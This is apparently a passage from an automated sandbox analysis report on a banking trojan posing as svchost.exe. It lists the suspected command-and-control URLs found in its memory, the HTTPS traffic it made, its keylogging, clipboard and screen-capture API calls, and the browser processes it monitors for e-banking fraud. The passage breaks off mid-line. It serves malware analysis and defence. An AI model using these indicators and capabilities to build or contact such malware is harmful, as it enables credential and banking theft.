Source: svchost.exe, 00000001.00000002.2911961286.000000000269F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vofycot.com/login.php
Source: svchost.exe, 00000001.00000003.1688021154.000000000267C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojyqem.com/login.php
Source: svchost.exe, 00000001.00000002.2910643811.0000000000871000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vojyqem.com/login.phpTemp
Source: svchost.exe, 00000001.00000003.2046828738.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195591504.00000000008A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://vonypom.com/login.php
Source: svchost.exe, 00000001.00000003.2832987183.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2155767071.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2910453874.0000000000863000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911142449.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801116203.00000000008DC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0247-3846-ad61-5b1f45bc95f4
Source: svchost.exe, 00000001.00000003.2654498481.00000000008FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7
Source: svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240824-0248-364a-9808-e6df4ec839e7http://ww16.vofycot.com/l
Source: svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229c
Source: svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0247-3858-b174-cdc5f33d229cco
Source: svchost.exe, 00000001.00000003.2654498481.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181
Source: svchost.exe, 00000001.00000003.2867988784.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww25.lyxynyx.com/login.php?subid1=20240824-0248-365f-be38-e61788a8e181co
Source: svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911856330.0000000002661000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855025683.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww3.galyqaz.com/
Source: svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1855025683.0000000002667000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2188198886.0000000002665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ww3.galyqaz.com/DigiCert
Source: svchost.exe, 00000001.00000003.2801351584.0000000002661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gahyqah.com/login.php
Source: svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.gahyqah.com/login.phpP
Source: svchost.exe, svchost.exe, 00000001.00000003.2886286564.000000000926D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2833106604.00000000026E7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2910825545.0000000000893000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1663107473.0000000002601000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.0000000000899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2088018994.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688004757.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.000000000267A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2868421198.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2679082243.0000000009201000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911227483.00000000008E8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2886133137.000000000088D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2913316247.0000000009232000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2209935730.00000000008F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898455985.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2801259005.00000000026EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898624617.0000000009225000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: svchost.exe, 00000001.00000003.1688063910.000000000087C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.coml
Source: svchost.exe, 00000001.00000003.1681297112.000000000264B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1681297112.000000000263A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.w.org/
Source: login[4].htm.1.dr	String found in binary or memory: https://cdn.consentmanager.net
Source: login[4].htm.1.dr	String found in binary or memory: https://delivery.consentmanager.net
Source: login[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.dr	String found in binary or memory: https://domaincntrol.com/?orighost=
Source: svchost.exe, 00000001.00000003.2274238543.0000000009206000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dts.gnpge.com
Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.sedoparking.com/templates/images/hero_nc.svg
Source: svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lysyvan.com/
Source: svchost.exe, 00000001.00000003.2868451599.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2195433175.00000000008EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228769554.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2168457862.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2654498481.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911300230.00000000008EE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2228803064.00000000008ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lysyvan.com/login.php
Source: svchost.exe, 00000001.00000003.2036392880.000000000263A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lysyvan.com/wp-json/
Source: login[3].htm1.1.dr, login[3].htm.1.dr, login[3].htm0.1.dr	String found in binary or memory: https://nojs.domaincntrol.com
Source: svchost.exe, 00000001.00000002.2911905036.000000000266F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2046828738.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1896894757.0000000002674000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/
Source: svchost.exe, 00000001.00000003.1728701380.0000000002667000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com//
Source: svchost.exe, 00000001.00000002.2911961286.000000000269F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2898499255.0000000009247000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1686977478.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2911905036.000000000267A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/login.php
Source: svchost.exe, 00000001.00000002.2912087987.00000000026CC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/login.phpgpage.namecheap.com;::ffff:91.195.240.19;
Source: svchost.exe, 00000001.00000003.1728739248.0000000002674000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/m/
Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2912011123.00000000026AD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qegyhig.com/wp-json/
Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.namecheap.com/domains/registration/results/?domain=gahyqah.com
Source: svchost.exe, 00000001.00000002.2911720784.0000000002600000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.sedo.com/services/parking.php3

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49654
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64293
Source: unknown	Network traffic detected: HTTP traffic on port 51114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64286 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56400 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49661
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64286
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64296
Source: unknown	Network traffic detected: HTTP traffic on port 64278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56400
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51114
Source: unknown	Network traffic detected: HTTP traffic on port 64296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49661 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56397 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56397
Source: unknown	Network traffic detected: HTTP traffic on port 64293 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64278

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49654 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49661 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51114 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:51121 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:64286 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:64296 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56397 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:56400 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to capture and log keystrokes

Source: C:\Windows\apppatch\svchost.exe	Code function: [tab]	1_2_02D32B50
Source: C:\Windows\apppatch\svchost.exe	Code function: [del]	1_2_02D32B50
Source: C:\Windows\apppatch\svchost.exe	Code function: [del]	1_2_02D32B50
Source: C:\Windows\apppatch\svchost.exe	Code function: [ins]	1_2_02D32B50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: [tab]	8_2_012F2B50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: [del]	8_2_012F2B50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: [del]	8_2_012F2B50
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: [ins]	8_2_012F2B50

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D292D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,

1_2_02D292D0

Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D292D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	1_2_02D292D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028992D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	5_2_028992D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_024492D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	6_2_024492D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012E92D0 GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,OpenClipboard,GlobalFree,EmptyClipboard,SetClipboardData,CloseClipboard,	8_2_012E92D0

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D450E0 GetDesktopWindow,GetWindowDC,_snprintf,CreateCompatibleDC,Sleep,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateDIBSection,SelectObject,BitBlt,GetDesktopWindow,GetDC,GetProcessHeap,HeapAlloc,memset,GetDIBits,GetDIBits,ReleaseDC,

1_2_02D450E0

Source: C:\Windows\apppatch\svchost.exe

Code function: 1_2_02D32B50 memset,GetProcessHeap,HeapAlloc,memset,GetProcessHeap,HeapValidate,GetProcessHeap,HeapReAlloc,GetKeyboardState,ToAscii,

1_2_02D32B50

E-Banking Fraud

Checks if browser processes are running

Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	1_2_02D37300
Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	1_2_02D37300
Source: C:\Windows\apppatch\svchost.exe	Code function: CreateToolhelp32Snapshot,Process32First,EnterCriticalSection,GetCurrentProcessId,StrStrIA,EnterCriticalSection,GetProcessHeap,RtlAllocateHeap,LeaveCriticalSection,Process32Next,GetHandleInformation,FindCloseChangeNotification, iexplore.exe\|opera.exe\|java.exe\|javaw.exe\|explorer.exe\|isclient.exe\|intpro.exe\|ipc_full.exe\|mnp.exe\|cbsmain.dll\|firefox.exe\|clmain.exe\|core.exe\|maxthon.exe\|avant.exe\|safari.exe\|svchost.exe\|chrome.exe\|notepad.exe\|rundll32.exe\|netscape.exe\|tbb-firefox.exe\|frd.ex	1_2_02D37300
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \chrome.exe	1_2_02D367D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \iexplore.exe	1_2_02D367D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \firefox.exe	1_2_02D367D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,GetModuleHandleA,GetProcAddress,StrStrIA,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle, \tbb-firefox.exe	1_2_02D367D0
Source: C:\Windows\apppatch\svchost.exe	Code function: SHGetFolderPathA,PathAddBackslashA,GetModuleFileNameA,StrStrIA,GetCommandLineA,GetCommandLineW,InitializeCriticalSection,InitializeCriticalSection,CreateMutexA,CreateThread,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,InitializeCriticalSection,CreateThread,GetHandleInformation,FindCloseChangeNotification,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,IsUserAnAdmin,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,CreateThread,CreateThread,GetHandleInformation,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,GetHandleInformation,CloseHandle,CreateThread,